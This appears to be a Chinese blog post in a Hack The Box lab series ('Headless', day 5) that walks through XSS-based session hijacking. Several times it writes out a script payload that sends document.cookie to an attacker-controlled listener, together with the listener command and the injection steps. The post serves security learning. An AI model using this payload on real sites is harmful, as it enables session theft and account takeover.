iT邦幫忙

2024 iThome 鐵人賽

DAY 5
0
Security

HTB_Headless系列 第 5

[Day 5]HTB_Headless(Script Injection_02)

  • 分享至 

  • xImage
  •  

HTB練習紀錄 — Headless

  • Session Hijacking

書接上回[Day 4]HTB_Headless(Script Injection_01)中,成功對http://10.10.11.8:5000/support 進行xss攻擊,接下來嘗試竊取網站底下的資料

有什麼資料值得竊取呢?回到[Day 2]HTB_Headless(Vulnerability discovery),使用 gobuster 嘗試進入http://10.10.11.8:5000/dashboard ,遭遇錯誤訊息"wrong credentials"
這邊可以看到Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs,這次就來竊取Cookie試試


Script Injection

Session Hijacking

根據參考資料,可以得知下列code可以竊取該網頁的cookie

<script>var i=new Image(); i.src="http://[your_IP]:8001/?cookie="+btoa(document.cookie);</script>

這裡的IP係指透過 HTB VPN 連線時所獲得的虛擬網路介面的 IP 位址。輸入ifconfig紅色底線就是[your_IP]
https://ithelp.ithome.com.tw/upload/images/20240808/20168534xZjCA0VVr7.png

Injection(注入攻擊)

  1. 打開http server對8001 port進行監聽
python3 -m http.server 8001
  1. 根據[Day 3]HTB_Headless(Burp) 中的Repeater,將http://10.10.11.8:5000/support 擷取封包中SB的值更改為下列 XSS攻擊
<script>var i=new Image(); i.src="http://[your_IP]:8001/?cookie="+btoa(document.cookie);</script>

https://ithelp.ithome.com.tw/upload/images/20240808/20168534sEsiIKPtod.png

  1. 按送出可以看到透過btoa()編碼為 Base64的Cookie
    https://ithelp.ithome.com.tw/upload/images/20240808/20168534H7A79quG1K.png

  2. 也可以去掉btoa()直接接收回傳的Cookie,只是等待時間較長

<script>var i=new Image(); i.src="http://[your_IP]:8001/?cookie="+document.cookie;</script>

https://ithelp.ithome.com.tw/upload/images/20240808/20168534A9ygy4wv2I.png

成功!!!

cookie=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0


今日提問

  1. 為何下列本章使用的Code會造成Cookie被竊取?看答案
<script>var i=new Image(); i.src="http://[your_IP]:8001/?cookie="+btoa(document.cookie);</script>
  1. 為何不能將SB的值更改為 <script>alert(document.cookie)</script> ,直接取得cookie不是比較快?看答案

參考來源:

  1. Script Injection
    [第十一週]資訊安全基礎 — 常見攻擊:跨網站指令碼(XSS)、SQL Injection
  2. HTB_Headless
    Headless Hack The Box (HTB) Write-Up

上一篇
[Day 4]HTB_Headless(Script Injection_01)
下一篇
[Day 6]HTB_Headless(Session Fixation)
系列文
HTB_Headless30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言